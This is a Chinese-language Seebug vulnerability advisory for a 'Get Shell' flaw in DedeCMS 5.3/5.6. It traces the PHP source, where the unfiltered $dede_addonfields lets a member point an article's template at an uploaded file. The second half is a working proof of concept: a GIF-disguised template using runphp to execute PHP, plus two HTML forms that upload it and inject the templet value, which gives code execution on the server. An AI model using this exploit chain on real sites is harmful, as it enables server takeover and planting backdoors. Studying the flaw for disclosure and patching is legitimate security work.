DEDECMS网站管理系统Get Shell漏洞

2010-08-18T00:00:00
ID SSV:20049
Type seebug
Reporter Root
Modified 2010-08-18T00:00:00

Description

DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于 DedeCms核心,是目前国内应用最广泛的php类CMS系统。

article_add.php

  1. ........................
  2. else if($dopost=='save')
  3. {
  4. include(DEDEMEMBER.'/inc/archives_check.php');
  5. //分析处理附加表数据
  6. $inadd_f = $inadd_v = '';
  7. if(!emptyempty($dede_addonfields))
  8. {
  9. $addonfields = explode(';',$dede_addonfields);
  10. ............................................ //省略部份代码
  11. $inadd_f .= ','.$vs[0];
  12. $inadd_v .= " ,'".${$vs[0]}."' ";
  13. }
  14. }
  15. }
  16. ..........................................
  17. $addtable = trim($cInfos['addtable']);
  18. if(emptyempty($addtable))
  19. {
  20. ......................................
  21. }
  22. else
  23. {
  24. $inquery = "INSERT INTO {$addtable}(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";
  25. if(!$dsql->ExecuteNoneQuery($inquery))
  26. {
  27. ..........................................
  28. }
  29. }
  30. ..........................................
  31. $artUrl = MakeArt($arcID,true); //利用地方(arc.archives.functions.php有定义)
  32. function MakeArt($aid,$ismakesign=false)
  33. {
  34. global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
  35. include_once(DEDEINC.'/arc.archives.class.php');
  36. if($ismakesign)
  37. {
  38. $envs['makesign'] = 'yes';
  39. }
  40. $arc = new Archives($aid);
  41. $reurl = $arc->MakeHtml(); //arc.archives.class.php有定义
  42. ............................
  43. }

arc.archives.class.php

  1. class Archives
  2. {
  3. ................
  4. function __construct($aid)
  5. {
  6. ............
  7. if($this->ChannelUnit->ChannelInfos['addtable']!='')
  8. {
  9. $query = "SELECT * FROM {$this->ChannelUnit->ChannelInfos['addtable']} WHERE aid = '$aid'";
  10. $this->addTableRow = $this->dsql->GetOne($query);
  11. }
  12. ........................
  13. if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)
  14. {
  15. if(is_array($this->addTableRow))
  16. {
  17. ...............................
  18. $this->Fields['templet'] = $this->addTableRow['templet'];//注意1
  19. ......................................
  20. }
  21. }
  22. .............................
  23. }
  24. function MakeHtml($isremote=0)
  25. {
  26. global $cfg_remote_site,$fileFirst;
  27. if($this->IsError)
  28. {
  29. return '';
  30. }
  31. $this->Fields["displaytype"] = "st";
  32. //预编译$th
  33. $this->LoadTemplet(); //触发1
  34. ......................................//省略部份代码
  35. $this->ParseDMFields($i,1);
  36. $this->dtp->SaveTo($truefilename); //触发2
  37. ......................................
  38. }
  39. 继续跟(触发1)$this->LoadTemplet(); //arc.archives.class.php有定义
  40. function LoadTemplet()
  41. {
  42. if($this->TempSource=='')
  43. {
  44. $tempfile = $this->GetTempletFile(); //注意2
  45. if(!file_exists($tempfile) || !is_file($tempfile))
  46. {
  47. echo "文档ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}<br />";
  48. echo "模板文件不存在,无法解析文档!";
  49. exit();
  50. }
  51. $this->dtp->LoadTemplate($tempfile); //触发3
  52. $this->TempSource = $this->dtp->SourceString;
  53. }
  54. else
  55. {
  56. $this->dtp->LoadSource($this->TempSource);
  57. }
  58. }
  59. 看注意2 的$this->GetTempletFile() //arc.archives.class.php有定义
  60. function GetTempletFile()
  61. {
  62. global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;
  63. $cid = $this->ChannelUnit->ChannelInfos['nid'];
  64. if(!emptyempty($this->Fields['templet'])) //注意3
  65. {
  66. $filetag = MfTemplet($this->Fields['templet']);
  67. if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;
  68. }
  69. else
  70. {
  71. $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
  72. }
  73. .......................................
  74. if($cid=='spec')
  75. {
  76. if( !emptyempty($this->Fields['templet']) )
  77. {
  78. $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;
  79. }
  80. else
  81. {
  82. $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
  83. }
  84. }
  85. ...........................................
  86. return $tmpfile;
  87. }

注意3中的值来自注意1是通过查表得来的,控制了它就等于控制了任意模板,然后通过触发3来触发漏洞 看下怎么控制注意1的值 article_edit.php

  1. ......................
  2. else if($dopost=='save')
  3. { ....................
  4. if(!emptyempty($dede_addonfields))
  5. {
  6. $addonfields = explode(';',$dede_addonfields);
  7. if(is_array($addonfields))
  8. {
  9. ........................
  10. ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);
  11. $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";
  12. }
  13. }
  14. ...................
  15. if($addtable!='')
  16. {
  17. $upQuery = "Update $addtable set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";
  18. if(!$dsql->ExecuteNoneQuery($upQuery))
  19. {..............
  20. }
  21. }
  22. ....................
  23. }

$dede_addonfields没有过滤,我们可以构造$inadd_f为,templet='上传的模板图片地址',包含我们的图片后,再通过触发2来生成图片里的后门!

DEDECMS 5.3/5.6 厂商补丁: DEDECMS


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.dedecms.com/

                                        
                                            
                                                 Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

   1.  &lt;form action=&quot;http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; &quot;&gt;  
   2. &lt;input type=&quot;hidden&quot; name=&quot;aid&quot; value=&quot;7&quot; /&gt;  
   3. &lt;input type=&quot;hidden&quot; name=&quot;mediatype&quot; value=&quot;1&quot; /&gt;  
   4. &lt;input type=&quot;text&quot; name=&quot;oldurl&quot; value=&quot;/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif&quot; /&gt;&lt;/br&gt;  
   5. &lt;input type=&quot;hidden&quot; name=&quot;dopost&quot; value=&quot;save&quot; /&gt;  
   6. &lt;input name=&quot;title&quot; type=&quot;hidden&quot; id=&quot;title&quot; value=&quot;1.jpg&quot; class=&quot;intxt&quot;/&gt;  
   7. &lt;input name=&quot;addonfile&quot; type=&quot;file&quot; id=&quot;addonfile&quot;/&gt;  
   8. &lt;button class=&quot;button2&quot; type=&quot;submit&quot; &gt;更改&lt;/button&gt;  
   9. &lt;/form&gt;  

构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
 
 

   1. &lt;form  action=&quot;http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;  
   2. &lt;input type=&quot;hidden&quot; name=&quot;dopost&quot; value=&quot;save&quot; /&gt;  
   3. &lt;input type=&quot;hidden&quot; name=&quot;aid&quot; value=&quot;2&quot; /&gt;  
   4. &lt;input type=&quot;hidden&quot; name=&quot;idhash&quot; value=&quot;ec66030e619328a6c5115b55483e8dbd&quot; /&gt;  
   5. &lt;input type=&quot;hidden&quot; name=&quot;channelid&quot; value=&quot;1&quot; /&gt;  
   6. &lt;input type=&quot;hidden&quot; name=&quot;oldlitpic&quot; value=&quot;&quot; /&gt;  
   7. &lt;input type=&quot;hidden&quot; name=&quot;sortrank&quot; value=&quot;1282049150&quot; /&gt;     
   8. &lt;input  name=&quot;title&quot; type=&quot;text&quot; id=&quot;title&quot; value=&quot;aaaaaaaaaaaaaaa&quot; maxlength=&quot;100&quot; class=&quot;intxt&quot;/&gt;  
   9. &lt;input type=&quot;text&quot; name=&quot;writer&quot; id=&quot;writer&quot; value=&quot;123456&quot; maxlength=&quot;100&quot; class=&quot;intxt&quot; style=&quot;width:219px&quot;/&gt;  
  10. &lt;select name='typeid' size='1'&gt;  
  11. &lt;option value='1' class='option3' selected=''&gt;Test&lt;/option&gt;  
  12. &lt;select name='mtypesid' size='1'&gt;  
  13. &lt;option value='0' selected&gt;请选择分类...&lt;/option&gt;  
  14. &lt;option value='1' class='option3' selected&gt;aa&lt;/option&gt;&lt;/select&gt;   
  15. &lt;textarea name=&quot;description&quot; id=&quot;description&quot;&gt;aaaaaaaaaaaaa&lt;/textarea&gt;  
  16. &lt;input type='hidden' name='dede_addonfields' value=&quot;templet&quot;&gt;  
  17. &lt;input type='hidden' name='templet' value=&quot;../uploads/userup/3/1.gif&quot;&gt;  
  18. &lt;input type=&quot;hidden&quot; id=&quot;body&quot; name=&quot;body&quot; value=&quot;aaaa&quot; style=&quot;display:none&quot; /&gt;  
  19. &lt;button class=&quot;button2&quot; type=&quot;submit&quot;&gt;提交&lt;/button&gt;  
  20. &lt;/form&gt;